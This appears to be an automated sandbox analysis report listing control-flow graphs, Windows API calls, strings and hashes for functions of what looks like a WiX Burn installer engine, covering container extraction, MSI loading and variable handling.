                                                                                                                                                                                                                                                                                                  control_flow_graph 1243 8642d7-86432e InitializeCriticalSection * 2 call 874d05 * 2 1248 864334 1243->1248 1249 864452-86445c call 86b48b 1243->1249 1250 86433a-864347 1248->1250 1254 864461-864465 1249->1254 1252 864445-86444c 1250->1252 1253 86434d-864379 lstrlenW * 2 CompareStringW 1250->1253 1252->1249 1252->1250 1255 8643cb-8643f7 lstrlenW * 2 CompareStringW 1253->1255 1256 86437b-86439e lstrlenW 1253->1256 1257 864467-864473 call 8a0237 1254->1257 1258 864474-86447c 1254->1258 1255->1252 1262 8643f9-86441c lstrlenW 1255->1262 1259 8643a4-8643a9 1256->1259 1260 86448a-86449f call 863821 1256->1260 1257->1258 1259->1260 1265 8643af-8643bf call 8629ce 1259->1265 1272 8644a4-8644ab 1260->1272 1263 8644b6-8644d0 call 863821 1262->1263 1264 864422-864427 1262->1264 1263->1272 1264->1263 1269 86442d-86443d call 8629ce 1264->1269 1278 8643c5 1265->1278 1279 86447f-864488 1265->1279 1269->1279 1281 86443f 1269->1281 1276 8644ac-8644b4 call 8a0237 1272->1276 1276->1258 1278->1255 1279->1276 1281->1252
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00865266,?,?,00000000,?,?), ref: 00864303
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(000000D0,?,?,00865266,?,?,00000000,?,?), ref: 0086430C
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00865266,?,?,00000000,?,?), ref: 00864352
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00865266,?,?,00000000,?,?), ref: 0086435C
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00865266,?,?,00000000,?,?), ref: 00864370
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00865266,?,?,00000000,?,?), ref: 00864380
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00865266,?,?,00000000,?,?), ref: 008643D0
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00865266,?,?,00000000,?,?), ref: 008643DA
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00865266,?,?,00000000,?,?), ref: 008643EE
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00865266,?,?,00000000,?,?), ref: 008643FE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3039292287-3209860532
                                                                                                                                                                                                                                                                                                  • Opcode ID: 95895500856b9ccc1dbe3919a70587662e55415a68c79f7129f65c7708f313dd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 09e4f1391cc06d49854472e269baeec598364ceda8e2ac8a2282026f087a6d90
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95895500856b9ccc1dbe3919a70587662e55415a68c79f7129f65c7708f313dd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8251B171A00215BEDB24DB68CC87F9E7B6CFF05760F110126FA14E7291DB74A950CBA5
                                                                                                                                                                                                                                                                                                  Function 0086C28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1283 86c28f-86c2c1 1284 86c2c3-86c2e1 CreateFileW 1283->1284 1285 86c32b-86c347 GetCurrentProcess * 2 DuplicateHandle 1283->1285 1288 86c2e7-86c2f1 GetLastError 1284->1288 1289 86c383-86c389 1284->1289 1286 86c381 1285->1286 1287 86c349-86c353 GetLastError 1285->1287 1286->1289 1292 86c355-86c35e 1287->1292 1293 86c360 1287->1293 1294 86c2f3-86c2fc 1288->1294 1295 86c2fe 1288->1295 1290 86c393 1289->1290 1291 86c38b-86c391 1289->1291 1298 86c395-86c3a3 SetFilePointerEx 1290->1298 1291->1298 1292->1293 1299 86c367-86c37f call 863821 1293->1299 1300 86c362 1293->1300 1294->1295 1296 86c305-86c318 call 863821 1295->1296 1297 86c300 1295->1297 1311 86c31d-86c326 call 8a0237 1296->1311 1297->1296 1302 86c3a5-86c3af GetLastError 1298->1302 1303 86c3da-86c3e0 1298->1303 1299->1311 1300->1299 1306 86c3b1-86c3ba 1302->1306 1307 86c3bc 1302->1307 1308 86c3e2-86c3e6 call 881741 1303->1308 1309 86c3fe-86c404 1303->1309 1306->1307 1312 86c3c3-86c3d8 call 863821 1307->1312 1313 86c3be 1307->1313 1317 86c3eb-86c3ef 1308->1317 1311->1309 1321 86c3f6-86c3fd call 8a0237 1312->1321 1313->1312 1317->1309 1318 86c3f1 1317->1318 1318->1321 1321->1309
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0086C47F,00865405,?,?,00865445), ref: 0086C2D6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086C47F,00865405,?,?,00865445,00865445,00000000,?,00000000), ref: 0086C2E7
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0086C47F,00865405,?,?,00865445,00865445,00000000,?), ref: 0086C336
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0086C47F,00865405,?,?,00865445,00865445,00000000,?,00000000), ref: 0086C33C
                                                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,0086C47F,00865405,?,?,00865445,00865445,00000000,?,00000000), ref: 0086C33F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086C47F,00865405,?,?,00865445,00865445,00000000,?,00000000), ref: 0086C349
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0086C47F,00865405,?,?,00865445,00865445,00000000,?,00000000), ref: 0086C39B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086C47F,00865405,?,?,00865445,00865445,00000000,?,00000000), ref: 0086C3A5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                                                                                                                                                                  • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2619879409-373955632
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2660a18ca3092100ffb6e9dd8a00552971d4acdc4d88f1efeb1a5fa59a34cd61
                                                                                                                                                                                                                                                                                                  • Instruction ID: b79faa7b8daf445638f553c99cc70d742ca1069f6a9382a350b791d1a3e242e7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2660a18ca3092100ffb6e9dd8a00552971d4acdc4d88f1efeb1a5fa59a34cd61
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32410E36540201ABDB219F698D45F2B7BA5FFC5720F228029FD64EB342EB75C801DBA1
                                                                                                                                                                                                                                                                                                  Function 008A2AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1324 8a2af7-8a2b17 call 863838 1327 8a2b1d-8a2b2b call 8a4a6c 1324->1327 1328 8a2c21-8a2c25 1324->1328 1332 8a2b30-8a2b4f GetProcAddress 1327->1332 1330 8a2c2f-8a2c35 1328->1330 1331 8a2c27-8a2c2a call 8a5636 1328->1331 1331->1330 1334 8a2b51 1332->1334 1335 8a2b56-8a2b6f GetProcAddress 1332->1335 1334->1335 1336 8a2b71 1335->1336 1337 8a2b76-8a2b8f GetProcAddress 1335->1337 1336->1337 1338 8a2b91 1337->1338 1339 8a2b96-8a2baf GetProcAddress 1337->1339 1338->1339 1340 8a2bb1 1339->1340 1341 8a2bb6-8a2bcf GetProcAddress 1339->1341 1340->1341 1342 8a2bd1 1341->1342 1343 8a2bd6-8a2bef GetProcAddress 1341->1343 1342->1343 1344 8a2bf1 1343->1344 1345 8a2bf6-8a2c10 GetProcAddress 1343->1345 1344->1345 1346 8a2c12 1345->1346 1347 8a2c17 1345->1347 1346->1347 1347->1328
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00863877
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863838: GetLastError.KERNEL32 ref: 00863881
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 008A4A9D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 008A2B41
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 008A2B61
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 008A2B81
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 008A2BA1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 008A2BC1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 008A2BE1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 008A2C01
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                                                                                                                                                                                                                                                  • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                                                                                                                                                                                                  • API String ID: 2510051996-1735120554
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1054e4368066ec6f749a1f194516a2f9808d1de18da0e23eaa81378c46d90d9b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9f659acb47d3b431e272b66a9a9ee5d9b7f356b04f58ef2d7945bc3979ab88a2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1054e4368066ec6f749a1f194516a2f9808d1de18da0e23eaa81378c46d90d9b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 713104B0900A08EBEB119F24ED03F1A7BB4FB35719F00013AE450A6A70F7B68851EF54
                                                                                                                                                                                                                                                                                                  Function 00881741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0086C3EB,?,00000000,?,0086C47F), ref: 00881778
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086C3EB,?,00000000,?,0086C47F,00865405,?,?,00865445,00865445,00000000,?,00000000), ref: 00881781
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorEventLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 545576003-938279966
                                                                                                                                                                                                                                                                                                  • Opcode ID: eac4b3ba59550ae87c3d7b2f07d1d2cd48c2af71b6e45c514448711d19028f11
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7d64abf84045fcb53e7cb4c2f68cfb1afe8dc99a1680643751bfdb0db5ddeb35
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eac4b3ba59550ae87c3d7b2f07d1d2cd48c2af71b6e45c514448711d19028f11
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE21B877D4163676EA2136A94C4AF67695CFB04BA0B124135FD20FB781EF54DC0187E2
                                                                                                                                                                                                                                                                                                  Function 0089FCAE Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 76libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 0089FCD6
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(SystemFunction041), ref: 0089FCE8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 0089FD2B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0089FD3F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 0089FD77
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0089FD8B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4214558900-3191127217
                                                                                                                                                                                                                                                                                                  • Opcode ID: c5e432351266d169dbc9632539799f2009e1599a356e3ef39dc2205434c71b07
                                                                                                                                                                                                                                                                                                  • Instruction ID: cd44c0959804d6a50f38dccb5ab671cfe8a87a841f5e7e3b94c060af88d13201
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5e432351266d169dbc9632539799f2009e1599a356e3ef39dc2205434c71b07
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8219232941AB69BDB256B65AD07F4679B0FB40B56F0A0135FE10EB362F779CC009AD0
                                                                                                                                                                                                                                                                                                  Function 008808C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 008808F2
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0088090A
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0088090F
                                                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00880912
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0088091C
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0088098B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00880998
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 00880940, 008809BC
                                                                                                                                                                                                                                                                                                  • Failed to open cabinet file: %hs, xrefs: 008809C9
                                                                                                                                                                                                                                                                                                  • Failed to add virtual file pointer for cab container., xrefs: 00880971
                                                                                                                                                                                                                                                                                                  • Failed to duplicate handle to cab container., xrefs: 0088094A
                                                                                                                                                                                                                                                                                                  • <the>.cab, xrefs: 008808EB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                                                                                                                                                                  • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3030546534-3446344238
                                                                                                                                                                                                                                                                                                  • Opcode ID: c4f767ae7353d5e90d1456c39a8d3a503b4a6792c2a77f880eae8eb34f978523
                                                                                                                                                                                                                                                                                                  • Instruction ID: 07627626f9bb4b867b634fb37890fa9604e8b9ba24bd8d1735860963a4556345
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4f767ae7353d5e90d1456c39a8d3a503b4a6792c2a77f880eae8eb34f978523
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1031E432A4163ABBEB216B958C49F9EBE68FF05760F110111FE14F7652D7609D008BE1
                                                                                                                                                                                                                                                                                                  Function 00866DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000001,?,00000000,00865445,00000006,?,008682B9,?,?,?,00000000,00000000,00000001), ref: 00866DC8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008656A9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00866595,00866595,?,0086563D,?,?,00000000), ref: 008656E5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008656A9: GetLastError.KERNEL32(?,0086563D,?,?,00000000,?,?,00866595,?,00867F02,?,?,?,?,?), ref: 00865714
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,008682B9), ref: 00866F59
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to find variable value '%ls'., xrefs: 00866DE3
                                                                                                                                                                                                                                                                                                  • Failed to insert variable '%ls'., xrefs: 00866E0D
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 00866E4B
                                                                                                                                                                                                                                                                                                  • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00866ED0
                                                                                                                                                                                                                                                                                                  • Setting hidden variable '%ls', xrefs: 00866E86
                                                                                                                                                                                                                                                                                                  • Attempt to set built-in variable value: %ls, xrefs: 00866E56
                                                                                                                                                                                                                                                                                                  • Failed to set value of variable: %ls, xrefs: 00866F41
                                                                                                                                                                                                                                                                                                  • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00866F6B
                                                                                                                                                                                                                                                                                                  • Unsetting variable '%ls', xrefs: 00866F15
                                                                                                                                                                                                                                                                                                  • Setting numeric variable '%ls' to value %lld, xrefs: 00866EFA
                                                                                                                                                                                                                                                                                                  • Setting string variable '%ls' to value '%ls', xrefs: 00866EED
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                                                                                                                                                                  • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2716280545-445000439
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8519ac4ecf5c7e35ffcc9fa3d314e6a79f6aa1df610add67a1938c30acb112f8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 92bc816cbcbeeb3b0a9ea8836e1ed5c59789c67d48921c2d0f43e8daf96af143
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8519ac4ecf5c7e35ffcc9fa3d314e6a79f6aa1df610add67a1938c30acb112f8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10513C71A40295A7EB309F58DC4AF6B3BA8FF56714F220019F805D6782E676DC60CBE1
                                                                                                                                                                                                                                                                                                  Function 00876A57 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,00864E11,?,?), ref: 00876A77
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?,00864E11,?,?), ref: 00876A7D
                                                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,?,00864E11,?,?), ref: 00876A80
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00864E11,?,?), ref: 00876A8A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,00864E11,?,?), ref: 00876B03
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to duplicate file handle for attached container., xrefs: 00876AB8
                                                                                                                                                                                                                                                                                                  • burn.filehandle.attached, xrefs: 00876AD0
                                                                                                                                                                                                                                                                                                  • core.cpp, xrefs: 00876AAE
                                                                                                                                                                                                                                                                                                  • %ls -%ls=%u, xrefs: 00876AD7
                                                                                                                                                                                                                                                                                                  • Failed to append the file handle to the command line., xrefs: 00876AEB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
